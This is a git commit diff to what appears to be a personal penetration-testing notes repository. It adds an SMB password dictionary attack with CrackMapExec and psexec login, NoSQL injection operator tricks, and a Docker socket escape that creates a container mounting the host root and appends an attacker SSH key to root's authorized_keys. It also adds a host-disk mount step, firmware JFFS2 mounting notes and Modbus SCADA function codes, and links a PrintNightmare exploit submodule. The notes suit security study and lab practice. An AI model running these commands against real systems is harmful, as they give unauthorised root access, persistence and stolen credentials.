This commit is contained in:
Stefan Friese 2021-11-04 17:19:58 +01:00
parent 6b8f9472c7
commit 7b33c61fec
8 changed files with 117 additions and 1 deletions

3
.gitmodules vendored
View File

@ -52,3 +52,6 @@
[submodule "exploit/windows/CVE-2021-1675"]
path = exploit/windows/CVE-2021-1675
url = https://github.com/calebstewart/CVE-2021-1675
[submodule "enumeration/priv_esc/deepce"]
path = enumeration/priv_esc/deepce
url = https://github.com/stealthcopter/deepce.git

10
crackmapexec.md Normal file
View File

@ -0,0 +1,10 @@
# Crackmapexec
* Dictionary attack against SMB
```sh
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```
* Use the password with `impacket/examples/psexec.py` in the following way
```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```

@ -1 +0,0 @@
Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d

@ -0,0 +1 @@
Subproject commit 229fad09eee712ede052525d4d3df29410bc0199

15
exploit/sqli/no_sqli.md Normal file
View File

@ -0,0 +1,15 @@
# NoSQL Injections
* No tables, but files (collections)
* Examples are Elasticsearch, MongoDB, Redis, CouchDB.
## Querying
* Filter instead of SQL queries
* [Redis docs](https://redis.io/documentation)
* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
* [Elasticsearch docs](https://www.elastic.co/guide/index.html)
## Tips & Tricks
* Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar`
* 2D array via `user[$nin][]=foo`

View File

@ -96,6 +96,35 @@ echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed
* Mount the device
```sh
mkdir /mnt/hostdev
mount /dev/<hostVda> /mnt/hostdev
```
## Creating a Container from inside another container
* Needs root inside a container
* Upload [static curl](https://github.com/moparisthebest/static-curl)
* Check available images and containers
```sh
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json
```
* Inside the container as root
```sh
curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}'
```
* Return value is the ID
* Start a container
```sh
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
```
* Login in to the host via ssh
## Dirty c0w
https://github.com/dirtycow/dirtycow.github.io

View File

@ -9,3 +9,27 @@
```sh
./fat.py <firmware>
```
* [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git`
## Usage
* Check image via `strings`
* Check CRC via `cksum -a crc <image>`
* Use `binwalk` to extract. There are to methods
* `-e` extract by offset
* `--dd=".*"` by file extension
### Mount JFFS2 File
* Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10`
```sh
rm -rf /dev/mtdblock0
mknod /dev/mtdblock0 b 31 0
mkdir /mnt/jffs2
modprobe jffs2
modprobe mtdram
modprobe mtdblock
dd if=<jffs2File> of=/dev/mtdblock0
mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/
```
## Tips & Tricks
* Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php)

View File

@ -0,0 +1,35 @@
# Supervisory Control and Data Acquisition (SCADA)
* SCADA works as an aggregatio of the following systems
* __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices.
* __Remote Terminal Unit (RTU)__, use for wide area telemetry
* __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input.
* __Communication network__
* Security is no first class citizen
## Modbus
* Developed by Modicon
* Master/Slave, latter has an 8 bit address.
* RS-485 Connector
* Data registers 16 bit
* Input register, 16 bit ro
* Hold register, rw
* Coil register, 1 bit rw
* Discrete register, 1bit ro
### Function Codes
* [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html)
* RTU request inside of TCP segments, port 502
* 1 __Read Coil__
* 2 __Read Discrete Input__
* 3 __Read Holding Registers__
* 4 __Read Input Registers__
* 5 __Write Single Coil__
* 6 __Write Single Holding Register__
* 15 __Write Multiple Coils__
* 16 __Write Multiple Holding Registers__